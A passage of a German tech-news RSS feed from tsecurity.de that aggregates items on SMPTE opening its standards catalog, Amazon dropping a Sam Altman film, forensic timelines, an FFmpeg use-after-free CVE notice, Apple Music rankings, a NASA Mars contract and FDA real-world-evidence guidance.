But this week SMPTE "announced that its complete Standards catalog, the technical backbone behind everything from SDI and timecode to IP-based broadcast workflows, is now freely available to anyone in the global media technology community," reports the filmmaking news site CineD, arguing it's "one of the more meaningful structural shifts we have seen from a standards body in years" that could "reshape how smaller developers and educators engage with professional media technology."

The move covers all published Standards, Recommended Practices, Engineering Guidelines and Registered Disclosure Documents, plus every future release, ending a long-standing model in which individual documents often sold for well over $100 each. For more than a century, SMPTE Standards have quietly governed how images and sound move through the production chain. If you have ever recorded timecode in the HH:MM:SS:FF format, routed a signal over 3G-SDI, or built a facility around the ST 2110 suite for media over IP, you have relied on SMPTE specifications, whether you knew it or not... Until now, accessing the actual text of those documents usually meant paying per file, a barrier that this announcement removes entirely... The latest releases are available through the Recently Published Documents page on the SMPTE website, with the complete archive reachable through the SMPTE Standards Library... 

There is also a practical, behind-the-scenes story here. The open-access move is part of a broader modernization of how SMPTE develops and publishes Standards. Recent initiatives include adopting GitHub-based workflows for version control, issue tracking and automation, transitioning to structured HTML-based authoring, and implementing an integrated publishing pipeline that streamlines document creation, review, validation and release... The most consequential beneficiaries are arguably not the large members already inside the system, but the developers, integrators, educators and manufacturers who previously worked around the paywall... The practical upshot is that developers and emerging markets can build from accurate primary specifications rather than secondhand sources, which matters enormously when a single misread tolerance or metadata field can break compatibility down the line. 

This also fits a wider pattern of the industry moving toward openness. We have previously covered moments like GoPro's decision to make its CineForm codec open source and release the SDK, a codec that SMPTE itself standardized in 2015 as an open standard for acquisition and post production. Lowering the cost of knowledge tends to widen the pool of people who can contribute to it, and a freely readable standards library is a significant step in that direction for an organization that has historically sat behind a per-document fee. 

"This was a decision we did not make lightly," says SMPTE President Rich Welsh. But "For 110 years, SMPTE has evolved alongside the media technology industry, helping to drive change and innovation — and we're not stopping now."


"Our industry is confronting transformative shifts, from IP-based workflows to AI authenticity and content provenance, and we find ourselves at another inflection point. We listened to our Members, Partners and the global Standards community, and the answer was clear: Interoperability is essential to the future of media. Now is the time to open the gates and ensure the next generation of media technology is built on a stronger, more accessible foundation." 

Thanks to innocent_white_lamb (Slashdot reader #151,825) for sharing the news.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=SMPTE+Opens+Entire+Standards+Catalog+for+Free%2C+Removing+Century-Old+Paywall%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F20%2F0429254%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F20%2F0429254%2Fsmpte-opens-entire-standards-catalog-for-free-removing-century-old-paywall%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/06/20/0429254/smpte-opens-entire-standards-catalog-for-free-removing-century-old-paywall?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon Drops Sam Altman Movie After Announcing OpenAI Partnership]]></title>
<description><![CDATA[Amazon MGM has dropped Luca Guadagnino's nearly completed Sam Altman biopic Artificial and is seeking another distributor for the film. The move comes months after Amazon expanded its multibillion-dollar partnership with OpenAI, fueling speculation about a potential conflict given the movie's rep...]]></description>
<link>https://tsecurity.de/de/3611431/it-security-nachrichten/amazon-drops-sam-altman-movie-after-announcing-openai-partnership/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611431/it-security-nachrichten/amazon-drops-sam-altman-movie-after-announcing-openai-partnership/</guid>
<pubDate>Sat, 20 Jun 2026 01:08:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Amazon MGM has dropped Luca Guadagnino's nearly completed Sam Altman biopic Artificial and is seeking another distributor for the film. The move comes months after Amazon expanded its multibillion-dollar partnership with OpenAI, fueling speculation about a potential conflict given the movie's reportedly unflattering portrayal of Altman. The Independent reports: Artificial would have marked the Oscar-nominated Call Me By Your Name director's third Amazon film, following the critically acclaimed Zendaya-led tennis romance Challengers (2024) and the academic scandal drama After the Hunt (2025), starring Julia Roberts. The new movie is said to chronicle the brief period when Altman was abruptly ousted as OpenAI's CEO in 2023 and subsequently rehired. Monica Barbaro and Ike Barinholtz star alongside Garfield as former OpenAI CTO Mira Murati and SpaceX founder Elon Musk, while Yura Borisov, Cooper Hoffman, Jason Schwartzman, Cooper Koch, Billie Lourd, Zosia Mamet, Angus Imrie, Chris O'Dowd, Mark Rylance and Margo's Got Money Troubles breakout Thaddea Graham round out the cast.
 
It is unclear exactly why the film was dropped, but according to Variety, the news came after it had already undergone positive screen tests. An early viewer told the publication that the film's portrayals of Altman and newly minted trillionaire Musk are the two characters audiences would "like the least." It was also reported that Amazon had already seen every early iteration of the script before Guadagnino was hired to direct. Altman and Amazon founder Jeff Bezos have developed a high-profile friendship over the years. In fact, the former was in attendance at Bezos's wedding to Lauren Sanchez, which took place in Venice, Italy, in 2025. In recent months, the two have continued to deepen their professional partnership that began in 2015, when Amazon became one of OpenAI's first investors. Ten years later, the companies closed their first major deal in November 2025, allowing the ChatGPT maker to run its systems on Amazon's U.S. data centers.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Amazon+Drops+Sam+Altman+Movie+After+Announcing+OpenAI+Partnership%3A+https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F06%2F19%2F2146253%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F06%2F19%2F2146253%2Famazon-drops-sam-altman-movie-after-announcing-openai-partnership%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://entertainment.slashdot.org/story/26/06/19/2146253/amazon-drops-sam-altman-movie-after-announcing-openai-partnership?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This life-size Koenigsegg just became the fastest drive-able Lego car ever — $5m hypercar recreated from 327,000 Technic elements and sent down Goodwood Hill at 69mph]]></title>
<description><![CDATA[The 1:1 'Big Build' celebrates the hillclimb record set by Koenigsegg at the 2015 Goodwood Festival of Speed.]]></description>
<link>https://tsecurity.de/de/3610928/it-nachrichten/this-life-size-koenigsegg-just-became-the-fastest-drive-able-lego-car-ever-5m-hypercar-recreated-from-327000-technic-elements-and-sent-down-goodwood-hill-at-69mph/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610928/it-nachrichten/this-life-size-koenigsegg-just-became-the-fastest-drive-able-lego-car-ever-5m-hypercar-recreated-from-327000-technic-elements-and-sent-down-goodwood-hill-at-69mph/</guid>
<pubDate>Fri, 19 Jun 2026 18:31:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The 1:1 'Big Build' celebrates the hillclimb record set by Koenigsegg at the 2015 Goodwood Festival of Speed.]]></content:encoded>
</item>
<item>
<title><![CDATA[Timelines]]></title>
<description><![CDATA[I like timelines, particularly when it comes to forensic investigations. There I said it. The first step to addressing an issue is admitting that you have a problem.I've been creating timelines since about 2008-ish, or so. I have a series of blog posts specifically on the topic of timeline analys...]]></description>
<link>https://tsecurity.de/de/3610829/windows-tipps/timelines/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610829/windows-tipps/timelines/</guid>
<pubDate>Fri, 19 Jun 2026 17:43:12 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOfksuuRwrgJCYga65tTT2plp5VPrPRllH2yHnV9EiPV25RKs2BUZcv57z2IMWRjkKEMQpCI6-r8iZPI2rRDWRyx6j9LFZR92lQmskul3nkJDENlJRmjBkIIG1D9uNr9TVQeZY4naJGGs-n_DUFpi5w5jafJaYdSmGOGoDDWaMp3TCbW2qTQ/s640/iron_man.jpg"><img border="0" data-original-height="640" data-original-width="434" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOfksuuRwrgJCYga65tTT2plp5VPrPRllH2yHnV9EiPV25RKs2BUZcv57z2IMWRjkKEMQpCI6-r8iZPI2rRDWRyx6j9LFZR92lQmskul3nkJDENlJRmjBkIIG1D9uNr9TVQeZY4naJGGs-n_DUFpi5w5jafJaYdSmGOGoDDWaMp3TCbW2qTQ/w136-h200/iron_man.jpg" width="136"></a></div><p>I like timelines, particularly when it comes to forensic investigations. </p><p>There I said it. The first step to addressing an issue is admitting that you have a problem.</p><p>I've been creating timelines since about 2008-ish, or so. I have a series of blog posts specifically on the topic of timeline analysis <a href="https://windowsir.blogspot.com/2009/02/timeline-analysis.html">starting in Feb 2009</a>, where I walk through some of the tools I used at the time to create timelines based on a 5-field "TLN" format that I developed...and still use to this day.</p><p>For example, take a look at <a href="https://www.huntress.com/blog/muddywater-attack-chain">this recent Huntress blog post</a> regarding activity attributed to the group "MuddyWater"; the time-based information in the blog post has the "Z" stripped from the time stamp, and spacing reduced, but when I drafted parts of this blog post, those sections included timeline info. </p><p>Another example is <a href="https://www.sophos.com/en-us/blog/wmi-persistence">this blog post</a> published almost a decade ago when I was with SecureWorks, which is now owned by Sophos. Right there in Figure 1, you see a timeline excerpt in the same format I used for about 8 yrs prior to that point, and still use today. </p><p>Yes, things have changed over time. I developed <a href="https://github.com/keydet89/Tools/blob/master/exe/eventmap.txt">eventmap</a> to help me "tag" event records within a timeline to help separate events of interest from the noise, and I later developed <a href="https://github.com/keydet89/Events-Ripper">Events Ripper</a> to help develop pivot points within the timeline. </p><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj0C2LpgU1dgQ1adYdsu1iblOgyvKZ9nZOAG1pG3_k1uZ3opcro5TQvR8q1dWZ8mR3NIIQ0v8arcMYhTsM-OCQCKMX282alIBqegJxOM5hRq-6EJmZMIR4ojekwCs8PW8ZSx1Or6NxE0MIpTKJpz0tX524L5iNmIdcHOK_ce2EJU5nASVEvA/s1313/blog.png" imageanchor="1"><img border="0" data-original-height="585" data-original-width="1313" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj0C2LpgU1dgQ1adYdsu1iblOgyvKZ9nZOAG1pG3_k1uZ3opcro5TQvR8q1dWZ8mR3NIIQ0v8arcMYhTsM-OCQCKMX282alIBqegJxOM5hRq-6EJmZMIR4ojekwCs8PW8ZSx1Or6NxE0MIpTKJpz0tX524L5iNmIdcHOK_ce2EJU5nASVEvA/s320/blog.png" width="320"></a></div>More recently, <a href="https://www.linkedin.com/in/lindsey-o-donnell-welch-abb72b4a/">Lindsey</a> and I <a href="https://www.huntress.com/blog/akira-ransomware-limewire-data-exfiltration">published a Huntress blog</a> based on an investigation into a threat actor's activities that led up to ransomware being deployed. For my part, the investigation into the virtual machine (provided by the customer) involved many of the very same tools and techniques talked about in my books, going back over a decade and a half, or more. I created <a href="https://windowsir.blogspot.com/2015/04/micro-mini-timelines.html">micro-timelines</a> and overlays from various data sources (MFT, USN change journal, browser history, etc.), and much like the drawing of the armor from the first IronMan movie, once the individual pieces were aligned and laid over each other, the full picture came into view.<p></p><p><i>The Power of Timelines</i><br>The DFIR Spot recently published a blog post discussing <a href="https://www.thedfirspot.com/post/from-chaos-to-chronology-the-power-of-forensic-timelines">the power of forensic timelines</a>; the blog post references <a href="https://www.linkedin.com/posts/cebrewer_introducing-sniper-incident-response-a-faster-activity-7325187584077299712-dW5h/">this LinkedIn post</a> from <a href="https://www.linkedin.com/in/cebrewer/">Chris Brewer</a>, and the first line of the LinkedIn post mentions "sniper incident response", a clear nod to <a href="https://www.linkedin.com/in/christopher-pogue-msis-6148441/">Chris Pogue</a>'s "<a href="https://archives.sector.ca/presentations12/Chris%20Pogue%20-%20Sniper%20Forensics%20Reloaded%20-%20Sector%202012.pdf">sniper forensics</a>".</p><p>A timeline is a powerful tool, and <i>not</i> something that should be left to the end of the engagement, where an analyst manually fills in a spreadsheet, because they have to. Rather, for me, a timeline has always been the first step in an engagement (yes, *after* collecting data sources). Timelines are incredible investigative tools, providing insight into activity and timing, as well as providing context. </p><p>A timeline can help direct the analyst to other data sources; if those data sources aren't available, that fact gets documented, as it can apply to control efficacy.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anstoss, Bundesliga Manager & Co: Wenn du diese Spiele kennst, war deine Jugend legendär]]></title>
<description><![CDATA[„Der muss doch auf die Bank“, „Den hätte ich im Leben nie geholt“, „Mein Verein braucht einen starken Linksaußen“. Sätze, die an jedem Fußballstammtisch fallen. Beinahe jeder Fußball-Fan ist irgendwann unzufrieden mit der Aufstellung, der Ausrichtung des Trainers oder den Taten des Managements. Z...]]></description>
<link>https://tsecurity.de/de/3610587/it-nachrichten/anstoss-bundesliga-manager-co-wenn-du-diese-spiele-kennst-war-deine-jugend-legendaer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610587/it-nachrichten/anstoss-bundesliga-manager-co-wenn-du-diese-spiele-kennst-war-deine-jugend-legendaer/</guid>
<pubDate>Fri, 19 Jun 2026 16:02:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[„Der muss doch auf die Bank“, „Den hätte ich im Leben nie geholt“, „Mein Verein braucht einen starken Linksaußen“. Sätze, die an jedem Fußballstammtisch fallen. Beinahe jeder Fußball-Fan ist irgendwann unzufrieden mit der Aufstellung, der Ausrichtung des Trainers oder den Taten des Managements. Zum Glück gibt es für den Computer in diversen Fußball-Managerspielen genügend Möglichkeiten, sein eigenes taktisches und fußballerisches Wissen unter Beweis zu stellen und zu zeigen, dass man selber die geeignetste Person für die Managerposition seines Lieblingsvereins ist.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-12706 | FFmpeg RASC Video Decoder decode_move use after free (WID-SEC-2026-2015)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in FFmpeg. This affects the function decode_move of the component RASC Video Decoder. The manipulation leads to use after free.

This vulnerability is documented as CVE-2026-12706. The attack can be initiated remotely. There is not any exploit ...]]></description>
<link>https://tsecurity.de/de/3610582/sicherheitsluecken/cve-2026-12706-ffmpeg-rasc-video-decoder-decodemove-use-after-free-wid-sec-2026-2015/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610582/sicherheitsluecken/cve-2026-12706-ffmpeg-rasc-video-decoder-decodemove-use-after-free-wid-sec-2026-2015/</guid>
<pubDate>Fri, 19 Jun 2026 15:54:31 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/ffmpeg">FFmpeg</a>. This affects the function <code>decode_move</code> of the component <em>RASC Video Decoder</em>. The manipulation leads to use after free.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-12706">CVE-2026-12706</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anstoss, Bundesliga Manager & Co: Wenn du diese Spiele kennst, hattest du eine geile Jugend]]></title>
<description><![CDATA[„Der muss doch auf die Bank“, „Den hätte ich im Leben nie geholt“, „Mein Verein braucht einen starken Linksaußen“. Sätze, die an jedem Fußballstammtisch fallen. Beinahe jeder Fußball-Fan ist irgendwann unzufrieden mit der Aufstellung, der Ausrichtung des Trainers oder den Taten des Managements. Z...]]></description>
<link>https://tsecurity.de/de/3610277/it-nachrichten/anstoss-bundesliga-manager-co-wenn-du-diese-spiele-kennst-hattest-du-eine-geile-jugend/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610277/it-nachrichten/anstoss-bundesliga-manager-co-wenn-du-diese-spiele-kennst-hattest-du-eine-geile-jugend/</guid>
<pubDate>Fri, 19 Jun 2026 14:02:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[„Der muss doch auf die Bank“, „Den hätte ich im Leben nie geholt“, „Mein Verein braucht einen starken Linksaußen“. Sätze, die an jedem Fußballstammtisch fallen. Beinahe jeder Fußball-Fan ist irgendwann unzufrieden mit der Aufstellung, der Ausrichtung des Trainers oder den Taten des Managements. Zum Glück gibt es für den Computer in diversen Fußball-Managerspielen genügend Möglichkeiten, sein eigenes taktisches und fußballerisches Wissen unter Beweis zu stellen und zu zeigen, dass man selber die geeignetste Person für die Managerposition seines Lieblingsvereins ist.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Music Unveils Top 20 Most-Streamed Artists Since 2015]]></title>
<description><![CDATA[Apple Music has shared its top 20 most-streamed artists of all time, giving fans a rare look at the biggest names on the platform since its launch in June 2015. Drake leads the full list, while Taylor Swift takes second place and becomes the most-streamed female artist ever on Apple Music.



Cha...]]></description>
<link>https://tsecurity.de/de/3610260/ios-mac-os/apple-music-unveils-top-20-most-streamed-artists-since-2015/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610260/ios-mac-os/apple-music-unveils-top-20-most-streamed-artists-since-2015/</guid>
<pubDate>Fri, 19 Jun 2026 13:55:36 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple Music has shared its top 20 most-streamed artists of all time, giving fans a rare look at the biggest names on the platform since its launch in June 2015. Drake leads the full list, while Taylor Swift takes second place and becomes the most-streamed female artist ever on Apple Music.



Chart Data shared the ranking on X, and Apple Music reposted it through its official account, confirming the platform’s all-time streaming leaders for the first time.



Drake leads Apple Music’s all-time streaming chart




https://twitter.com/chartdata/status/2067708890116968833




The list shows a strong presence from rap and hip-hop artists, with Future, YoungBoy Never Broke Again, Lil Baby, Kanye West, Travis Scott, Kendrick Lamar, Lil Durk, Gunna, Rod Wave, and Eminem all making the top 20.



Here is the full Apple Music top 20 most-streamed artists list:




Drake



Taylor Swift



Future



YoungBoy Never Broke Again



Bad Bunny



Lil Baby



The Weeknd



Morgan Wallen



Kanye West



Post Malone



Travis Scott



Ariana Grande



Chris Brown



Kendrick Lamar



Lil Durk



Gunna



Rod Wave



Ed Sheeran



Justin Bieber



Eminem




Taylor Swift’s place on the list also carries history because she publicly challenged Apple Music before launch over its free trial payment policy for artists. Apple later changed its decision, and Swift brought 1989 to the service.



Apple Music requires an active subscription and costs $10.99 per month for an individual plan in the U.S., with student, family, and Apple One bundle options also available.]]></content:encoded>
</item>
<item>
<title><![CDATA[NASA Picks Eric Schmidt's Rocket Company For Mars Mission]]></title>
<description><![CDATA[NASA has selected Relativity Space to build and launch Aeolus, a 2028 Mars orbiter that would provide daily global measurements of dust, winds, and atmospheric temperatures to support future robotic and human missions. TechCrunch reports: The structure of the contract is akin to the deals that NA...]]></description>
<link>https://tsecurity.de/de/3610149/it-security-nachrichten/nasa-picks-eric-schmidts-rocket-company-for-mars-mission/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610149/it-security-nachrichten/nasa-picks-eric-schmidts-rocket-company-for-mars-mission/</guid>
<pubDate>Fri, 19 Jun 2026 13:08:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[NASA has selected Relativity Space to build and launch Aeolus, a 2028 Mars orbiter that would provide daily global measurements of dust, winds, and atmospheric temperatures to support future robotic and human missions. TechCrunch reports: The structure of the contract is akin to the deals that NASA made with SpaceX to fly cargo to the International Space Station, or Firefly Aerospace to put a lander on the Moon. The government agency handles the science, while the private company provides low-cost infrastructure. Aeolus, as the mission is dubbed, will contain four instruments to measure and image Mars from orbit, providing what NASA expects to be the first daily, global view of dust, winds, and temperature in its atmosphere. The agency said that data will make it safer for landers and, someday, astronauts, to visit the surface of the Red Planet.
 
By pairing NASA's world-class instruments with commercial innovation and investment, we can deliver more science, more often, and reduce the time it takes to get essential data into the hands of researchers preparing for future human missions to Mars," NASA administrator Jared Isaacman said in statement. The mission is set to launch in 2028 -- a rapid pace that will require Relativity to design and build the spacecraft to carry the Aeolus instruments, and finish building the rocket that will carry it to space, all on a tight timeline. NASA did not disclose how much it is paying Relativity for the mission, and Relativity did not respond to questions from TechCrunch.
 
Relativity was founded in 2015 by two former SpaceX and Blue Origin engineers, with the idea of using 3D printing to its maximum potential as a path to building a cheaper rocket. The company's first design, Terran-1, launched in March 2023 and failed mid-flight. Relativity doubled down by moving on to a larger design, dubbed the Terran R. Before Relativity could get it to the launch pad, the company ran into fundraising challenges, and Schmidt took a majority stake in the company in it last year, installing himself as CEO. He's been tight-lipped about the investment but has expressed interest in orbital data centers, and is thought to be using Relativity to launch a space telescope, Lazuili, financed by his family philanthropy, Schmidt Sciences.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=NASA+Picks+Eric+Schmidt's+Rocket+Company+For+Mars+Mission%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F06%2F18%2F2349246%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F06%2F18%2F2349246%2Fnasa-picks-eric-schmidts-rocket-company-for-mars-mission%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/06/18/2349246/nasa-picks-eric-schmidts-rocket-company-for-mars-mission?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why the FDA’s new real-world evidence guidance ends the era of structured-data-only submissions]]></title>
<description><![CDATA[On February 17, 2026, the FDA’s final guidance on the use of real-world evidence to support regulatory decision-making for medical devices became operational. It asks sponsors to demonstrate that their real-world data is relevant, reliable, complete and traceable, for every clinical fact rather t...]]></description>
<link>https://tsecurity.de/de/3609971/it-security-nachrichten/why-the-fdas-new-real-world-evidence-guidance-ends-the-era-of-structured-data-only-submissions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609971/it-security-nachrichten/why-the-fdas-new-real-world-evidence-guidance-ends-the-era-of-structured-data-only-submissions/</guid>
<pubDate>Fri, 19 Jun 2026 12:08:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>On February 17, 2026, the FDA’s <a href="https://www.fda.gov/regulatory-information/search-fda-guidance-documents/use-real-world-evidence-support-regulatory-decision-making-medical-devices" rel="nofollow">final guidance on the use of real-world evidence to support regulatory decision-making for medical devices</a> became operational. It asks sponsors to demonstrate that their real-world data is relevant, reliable, complete and traceable, for every clinical fact rather than each dataset as a whole. The first wave of submissions under the new rules is now landing at the agency, and a structural problem with how most secondary-use clinical data is built today is about to become visible.</p>



<p>The premise behind those pipelines is that structured electronic health record (EHR) fields plus claims data offer a defensible foundation for evidence. They are easier to extract and standardize, and map cleanly to common data models like OMOP. The implicit assumption is that what is missing from the structured fields is either marginal or available somewhere else. The peer-reviewed record says otherwise.</p>



<h2 class="wp-block-heading">The clinical signal that matters lives in text</h2>



<p>Across condition areas where regulatory submissions depend on completeness, structured fields capture a small fraction of what clinicians have documented.</p>



<p>Social determinants of health are the starkest case. A <a href="https://www.nature.com/articles/s41746-023-00970-0" rel="nofollow">2024 study in <em>npj Digital Medicine</em></a> compared natural language processing on clinical notes against ICD-10 Z-codes for the same patients: NLP identified adverse SDoH in 93.8% of patients, while the structured codes identified 2.0%. For a regulatory question about outcomes by housing, food or transportation security, structured data is not a partial view. It is absent.</p>



<p>Family history follows a similar shape. <a href="https://pmc.ncbi.nlm.nih.gov/articles/PMC4765557/" rel="nofollow">A 2015 study in the <em>AMIA Annual Symposium Proceedings</em></a> found specified family history in 58.7% of neurology admission notes against 5.2% in the structured record, a twelvefold gap. Any genetics-aware risk model that draws only from structured fields operates without most of its predictive signal.</p>



<p>In oncology, the data that drives staging, therapy and outcomes lives in pathology reports and clinic notes rather than discrete fields. <a href="https://www.jmir.org/2022/3/e27210" rel="nofollow">A 2022 study in the <em>Journal of Medical Internet Research</em></a> reported 93.5–97.6% accuracy for cancer site and histology extracted directly from free-text pathology reports. Without that extraction, the structured oncology record is, on its own, incomplete enough that cancer registry and external-control-arm work cannot be defended.</p>



<p>For diagnoses more generally, <a href="https://www.sciencedirect.com/science/article/pii/S1386505621000782" rel="nofollow">a 2021 audit in the <em>International Journal of Medical Informatics</em></a> found that nearly 40% of important inpatient diagnoses appeared only in free-text notes and never reached the structured problem list. <a href="https://www.johnsnowlabs.com/wp-content/uploads/2025/06/PHuSE_2025_MOSAIC-NLP_Poster.pdf" rel="nofollow">A 2025 study presented at the PHUSE/FDA Computational Science Symposium</a> reported that observed suicidality and self-harm events doubled once unstructured EHR data was added to the surveillance window. This is consistent with <a href="https://pmc.ncbi.nlm.nih.gov/articles/PMC5943451/" rel="nofollow">earlier work</a> showing that only about 3% of suicidal ideation events and 19% of suicide-attempt events documented in notes carry corresponding ICD codes. For pharmacovigilance and safety analyses, the gap is the difference between detecting a signal and missing it.</p>



<h2 class="wp-block-heading">And what is captured is noisier than it looks</h2>



<p>Treating the structured record as ground truth understates a second problem: the codes that are present are frequently wrong. <a href="https://pubmed.ncbi.nlm.nih.gov/29854158/" rel="nofollow">A 2017 simulation study in the <em>AMIA Annual Symposium Proceedings</em></a> found that just over half of entered diagnosis codes were appropriate for the clinical scenario, and about a quarter of the codes expected from the chart were omitted entirely. <a href="https://pubmed.ncbi.nlm.nih.gov/36618791/" rel="nofollow">A 2022 study in the <em>Annals of Translational Medicine</em></a> reported an average of 4.9 medication discrepancies per patient, with more than 90% of patients carrying at least one. And <a href="https://www.cdc.gov/mmwr/volumes/66/wr/mm6645a2.htm" rel="nofollow">the CDC has documented</a> that about one in five new prescriptions is never filled, and roughly half of those filled are taken incorrectly.</p>



<p>The structured layer is not only thin. It is also unreliable in ways that propagate silently into derived measures. This brings the discussion to the most uncomfortable finding.</p>



<h2 class="wp-block-heading">Completeness changes the answer, not just the coverage</h2>



<p><a href="https://www.ajmc.com/view/electronic-health-record-problem-lists-accurate-enough-for-risk-adjustment" rel="nofollow">A 2018 study in the <em>American Journal of Managed Care</em></a> computed <a href="https://pubmed.ncbi.nlm.nih.gov/3558716/" rel="nofollow">Charlson comorbidity scores</a> (a widely used mortality-prediction index) from two sources for the same patients: from free-text clinical notes and from the structured problem list. The version computed from the notes predicted long-term mortality. The version computed from the structured record did not. The math was identical. The data layer changed which conclusions were valid.</p>



<p>This is the pattern the new FDA guidance is responding to. The agency’s relevance-and-reliability framework cares less about volume than about accuracy. The clinical facts in a submission have to accurately represent what happened to the patient, and critical information cannot be systematically missing. A submission whose underlying measure is built on the structured-only Charlson is, by the agency’s own framework, not fit for the regulatory question it is being used to answer.</p>



<h2 class="wp-block-heading">What this means for the architecture, not just the dataset</h2>



<p>The implication runs deeper than “add NLP to your pipeline.” It changes the unit of work. Under the new guidance, the question is no longer “is this dataset complete enough?” but “is this fact about this patient accurate, and where did it come from?” Every clinical assertion in a real-world evidence submission has to be treatable as a claim: sourced, dated, contextualized, scored for confidence and reconcilable when sources disagree.</p>



<p>That has architectural consequences. It means ingesting and parsing every modality losslessly, including text, FHIR, HL7, DICOM and PDFs, without throwing away the original. It means extraction with healthcare-specific language models that handle negation, assertion status, temporality and clinical context. It means terminology mapping that survives audit. It means a reconciliation layer that knows what to do when the chart says 80 mg and the pharmacy feed says 40 mg and surfaces the conflict rather than picking silently.</p>



<p>None of that is exotic engineering. But it is incompatible with pipelines whose first design assumption was that structured fields would carry the load. Sponsors operating under the new guidance will need to rebuild that assumption from the ground up.</p>



<p>Capturing the right data is the easier part. Proving you captured it correctly, fact by fact, is the harder one. The new guidance treats both as requirements, not options.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft-Betriebssysteme: Die Windows-Geschichte von 1.0 bis 11]]></title>
<description><![CDATA[Microsoft bringt Windows 1.0 am 20. November 1985 auf den Markt. Knapp 40 Jahre später blicken wir zurück auf die Erfolgsgeschichte des Windows-Betriebssystems.Microsoft



Am 20. November 1985 veröffentlicht die damals noch kleine Softwarefirma Microsoft mit Windows 1.0 die erste grafische Benut...]]></description>
<link>https://tsecurity.de/de/3609342/it-security-nachrichten/microsoft-betriebssysteme-die-windows-geschichte-von-10-bis-11/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609342/it-security-nachrichten/microsoft-betriebssysteme-die-windows-geschichte-von-10-bis-11/</guid>
<pubDate>Fri, 19 Jun 2026 06:07:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
